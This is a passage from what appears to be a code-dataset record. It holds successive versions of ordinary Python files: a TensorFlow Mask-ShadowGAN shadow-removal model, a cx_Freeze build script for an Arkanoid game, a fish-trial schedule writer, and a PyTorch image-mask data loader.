starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = tf.where(tf.greater_equal(global_step,\n start_decay_step), tf.train.polynomial_decay(\n starter_learning_rate, global_step - start_decay_step,\n decay_steps, end_learning_rate, power=1.0),\n starter_learning_rate)\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=\n beta1, name=name).minimize(loss, global_step=global_step,\n var_list=variables)\n return learning_step\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.\n variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name=\n 'Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name=\n 'Adam_D_B')\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer,\n D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-4": "import tensorflow as tf\nfrom models.base_model import BaseModel\nfrom utils.im_utils import batch_convert_2_int\nfrom datasets.single_dataset import SingleDataset\nfrom datasets.unpaired_dataset import UnpairedDataset\nfrom models.generators.maskshadowgan_generators import Generator\nfrom models.discriminators.maskshadowgan_discriminators import Discriminator\n\n\nclass MaskShadowGANModel(BaseModel):\n \"\"\"\n Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.\n\n A: shadow images domain\n B: shadow free images domain\n\n Paper: https://arxiv.org/pdf/1903.10683.pdf\n \"\"\"\n\n def __init__(self, opt, training):\n BaseModel.__init__(self, opt, training)\n self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, 1])\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = tf.where(tf.greater_equal(global_step,\n start_decay_step), tf.train.polynomial_decay(\n starter_learning_rate, global_step - start_decay_step,\n decay_steps, end_learning_rate, power=1.0),\n starter_learning_rate)\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=\n beta1, name=name).minimize(loss, global_step=global_step,\n var_list=variables)\n return learning_step\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.\n variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name=\n 'Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name=\n 'Adam_D_B')\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer,\n D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-5": "import tensorflow as tf\nfrom models.base_model import BaseModel\nfrom utils.im_utils import batch_convert_2_int\nfrom datasets.single_dataset import SingleDataset\nfrom datasets.unpaired_dataset import UnpairedDataset\nfrom models.generators.maskshadowgan_generators import Generator\nfrom models.discriminators.maskshadowgan_discriminators import Discriminator\n\n\nclass MaskShadowGANModel(BaseModel):\n \"\"\"\n Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.\n\n A: shadow images domain\n B: shadow free images domain\n\n Paper: https://arxiv.org/pdf/1903.10683.pdf\n \"\"\"\n def __init__(self, opt, training):\n BaseModel.__init__(self, opt, training)\n\n # create placeholders for images and shadow masks\n self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache', cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n\n return dataA_iter, dataB_iter, dataA_iter.get_next(), dataB_iter.get_next()\n else: # only need shadow dataset for testing\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n # add ops for generator (A->B) to graph\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf, norm_type=self.opt.layer_norm_type,\n init_type=self.opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='G')\n\n if self.training:\n # add ops for other generator (B->A) and discriminators to graph\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,\n init_gain=self.opt.weight_init_gain, training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,\n init_gain=self.opt.weight_init_gain, training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,\n init_gain=self.opt.weight_init_gain, training=self.training, name='D_B')\n\n # generate fake images\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n\n # generate reconstructed images\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n\n # generate identity mapping images\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(reconstructedB))\n\n # add loss ops to graph\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB, reconstructedA,\n reconstructedB, identA, identB)\n\n # add optimizer ops to graph\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else: # only need generator from A->B during testing\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA, identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n # compute the generators loss\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n\n # Compute the disciminators loss. Use fake images from image pool to improve stability\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) + \\\n tf.reduce_mean(tf.square(D(fake))))\n\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.realA)) + \\\n self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB - self.realB))\n\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.abs(identB - self.realA)) + \\\n self.opt.lamB * tf.reduce_mean(tf.abs(identA - self.realB)))\n\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = (tf.where(tf.greater_equal(global_step, start_decay_step),\n tf.train.polynomial_decay(starter_learning_rate,\n global_step-start_decay_step,\n decay_steps, end_learning_rate,\n power=1.0),\n starter_learning_rate))\n\n learning_step = (tf.train.AdamOptimizer(learning_rate, beta1=beta1, name=name)\n .minimize(loss, global_step=global_step, var_list=variables))\n\n return learning_step\n\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name='Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name='Adam_D_B')\n\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer, D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-ids": [
8,
9,
11,
12,
13
]
}
|
[
8,
9,
11,
12,
13
] |
# Run 'python setup.py build' on cmd
import sys
from cx_Freeze import setup, Executable
import os.path
PYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))
os.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')
os.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')
options = {
'build_exe': {
'include_files': [
'bg_music.wav',
],
'path': sys.path + ['modules']
}
}
executables = [
Executable('game.py')
]
setup(name='Arkanoid',
version='1.0',
description='Python Game',
options=options,
executables=executables
)
|
normal
|
{
"blob_id": "f317d67b98eab1f0f192fa41f9bcc32b0c1e8eb0",
"index": 8301,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='Arkanoid', version='1.0', description='Python Game', options=\n options, executables=executables)\n",
"step-3": "<mask token>\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\noptions = {'build_exe': {'include_files': ['bg_music.wav'], 'path': sys.\n path + ['modules']}}\nexecutables = [Executable('game.py')]\nsetup(name='Arkanoid', version='1.0', description='Python Game', options=\n options, executables=executables)\n",
"step-4": "import sys\nfrom cx_Freeze import setup, Executable\nimport os.path\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\noptions = {'build_exe': {'include_files': ['bg_music.wav'], 'path': sys.\n path + ['modules']}}\nexecutables = [Executable('game.py')]\nsetup(name='Arkanoid', version='1.0', description='Python Game', options=\n options, executables=executables)\n",
"step-5": "# Run 'python setup.py build' on cmd\r\n\r\nimport sys\r\nfrom cx_Freeze import setup, Executable\r\n\r\nimport os.path\r\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\r\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')\r\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\r\n\r\noptions = {\r\n 'build_exe': {\r\n 'include_files': [\r\n 'bg_music.wav',\r\n ],\r\n 'path': sys.path + ['modules']\r\n }\r\n}\r\n\r\nexecutables = [\r\n Executable('game.py')\r\n]\r\n\r\nsetup(name='Arkanoid',\r\n version='1.0',\r\n description='Python Game',\r\n options=options,\r\n executables=executables\r\n )\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import json
import argparse
import sys
import os
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument("-sd","--startdate", help="Date to start scheduling trials, format is MM/DD.", required=True)
ap.add_argument("-r", "--round",help="A number.", required=True)
ap.add_argument("-hs", "--hsched", help="Which high schedule to use (e.g. H1, H2, H3)", required=True)
ap.add_argument("-ls", "--lsched", help="Which low schedule to use (e.g. H1, H2, H3)", required=True)
ap.add_argument("-h1", "--hfish1", help="1st Fish that will be assigned H schedule", required=True)
ap.add_argument("-h2", "--hfish2", help="2nd Fish that will be assigned H schedule", required=True)
ap.add_argument("-h3", "--hfish3", help="3rd Fish that will be assigned H schedule", required=True)
ap.add_argument("-l1", "--lfish1", help="1st Fish that will be assigned L schedule", required=True)
ap.add_argument("-l2", "--lfish2", help="2nd Fish that will be assigned L schedule", required=True)
ap.add_argument("-l3", "--lfish3", help="3rd Fish that will be assigned L schedule", required=True)
args = vars(ap.parse_args())
a_dict = {"startDate": args["startdate"], "round": args["round"], "h_schedule": args["hsched"], "l_schedule": args["lsched"], "mapping": {"H": { "fish1" : args["hfish1"], "fish2": args["hfish2"], "fish3": args["hfish3"]}, "L": { "fish1" : args["lfish1"], "fish2": args["lfish2"], "fish3": args["lfish3"]}}}
#print a_dict
os.remove('top.json')
with open('top.json', 'w') as f:
json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))
sys.exit(0)
|
normal
|
{
"blob_id": "e4767d8a4991a1180cc185c4c2d77104d63f9c7a",
"index": 6858,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('-sd', '--startdate', help=\n 'Date to start scheduling trials, format is MM/DD.', required=True)\n ap.add_argument('-r', '--round', help='A number.', required=True)\n ap.add_argument('-hs', '--hsched', help=\n 'Which high schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-ls', '--lsched', help=\n 'Which low schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-h1', '--hfish1', help=\n '1st Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h2', '--hfish2', help=\n '2nd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h3', '--hfish3', help=\n '3rd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-l1', '--lfish1', help=\n '1st Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l2', '--lfish2', help=\n '2nd Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l3', '--lfish3', help=\n '3rd Fish that will be assigned L schedule', required=True)\n args = vars(ap.parse_args())\n a_dict = {'startDate': args['startdate'], 'round': args['round'],\n 'h_schedule': args['hsched'], 'l_schedule': args['lsched'],\n 'mapping': {'H': {'fish1': args['hfish1'], 'fish2': args['hfish2'],\n 'fish3': args['hfish3']}, 'L': {'fish1': args['lfish1'], 'fish2':\n args['lfish2'], 'fish3': args['lfish3']}}}\n os.remove('top.json')\n with open('top.json', 'w') as f:\n json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))\n sys.exit(0)\n",
"step-3": "import json\nimport argparse\nimport sys\nimport os\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('-sd', '--startdate', help=\n 'Date to start scheduling trials, format is MM/DD.', required=True)\n ap.add_argument('-r', '--round', help='A number.', required=True)\n ap.add_argument('-hs', '--hsched', help=\n 'Which high schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-ls', '--lsched', help=\n 'Which low schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-h1', '--hfish1', help=\n '1st Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h2', '--hfish2', help=\n '2nd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h3', '--hfish3', help=\n '3rd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-l1', '--lfish1', help=\n '1st Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l2', '--lfish2', help=\n '2nd Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l3', '--lfish3', help=\n '3rd Fish that will be assigned L schedule', required=True)\n args = vars(ap.parse_args())\n a_dict = {'startDate': args['startdate'], 'round': args['round'],\n 'h_schedule': args['hsched'], 'l_schedule': args['lsched'],\n 'mapping': {'H': {'fish1': args['hfish1'], 'fish2': args['hfish2'],\n 'fish3': args['hfish3']}, 'L': {'fish1': args['lfish1'], 'fish2':\n args['lfish2'], 'fish3': args['lfish3']}}}\n os.remove('top.json')\n with open('top.json', 'w') as f:\n json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))\n sys.exit(0)\n",
"step-4": "import json\nimport argparse\nimport sys\nimport os\n\nif __name__ == '__main__':\n\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-sd\",\"--startdate\", help=\"Date to start scheduling trials, format is MM/DD.\", required=True)\n ap.add_argument(\"-r\", \"--round\",help=\"A number.\", required=True)\n ap.add_argument(\"-hs\", \"--hsched\", help=\"Which high schedule to use (e.g. H1, H2, H3)\", required=True)\n ap.add_argument(\"-ls\", \"--lsched\", help=\"Which low schedule to use (e.g. H1, H2, H3)\", required=True)\n ap.add_argument(\"-h1\", \"--hfish1\", help=\"1st Fish that will be assigned H schedule\", required=True)\n ap.add_argument(\"-h2\", \"--hfish2\", help=\"2nd Fish that will be assigned H schedule\", required=True)\n ap.add_argument(\"-h3\", \"--hfish3\", help=\"3rd Fish that will be assigned H schedule\", required=True)\n ap.add_argument(\"-l1\", \"--lfish1\", help=\"1st Fish that will be assigned L schedule\", required=True)\n ap.add_argument(\"-l2\", \"--lfish2\", help=\"2nd Fish that will be assigned L schedule\", required=True)\n ap.add_argument(\"-l3\", \"--lfish3\", help=\"3rd Fish that will be assigned L schedule\", required=True)\n\n args = vars(ap.parse_args())\n\n a_dict = {\"startDate\": args[\"startdate\"], \"round\": args[\"round\"], \"h_schedule\": args[\"hsched\"], \"l_schedule\": args[\"lsched\"], \"mapping\": {\"H\": { \"fish1\" : args[\"hfish1\"], \"fish2\": args[\"hfish2\"], \"fish3\": args[\"hfish3\"]}, \"L\": { \"fish1\" : args[\"lfish1\"], \"fish2\": args[\"lfish2\"], \"fish3\": args[\"lfish3\"]}}}\n\n #print a_dict\n\n os.remove('top.json')\n\n with open('top.json', 'w') as f:\n json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))\n\n sys.exit(0)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import cv2
import numpy as np
import torch
import torch.utils.data
import torchvision
from torchvision import transforms
from utils.utils import loadYaml
from .base_datalayer import BaseDataLayer
import albumentations as albu
class Datalayer(BaseDataLayer):
def __init__(self, config, augmentation=None, preprocessing=None):
super(Datalayer, self).__init__()
self.config = config
train_dir = self.config['Dataset']['TrainPath']
bg_imgs_dir = os.path.join(train_dir, 'bg')
mask_suffix = '_mask.png'
img_suffix = '.png'
self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if
bg_mask_name.endswith(mask_suffix)]
self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]
ng_imgs_dir = os.path.join(train_dir, 'ng')
self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if
ng_img_name.endswith(mask_suffix)]
self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]
self.augmentation = augmentation
self.preprocessing = preprocessing
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
# bg
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]
# ng
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
|
normal
|
{
"blob_id": "9928eaa32468453f405d8bb650f3e0e85a7933bf",
"index": 5514,
"step-1": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n <mask token>\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-2": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
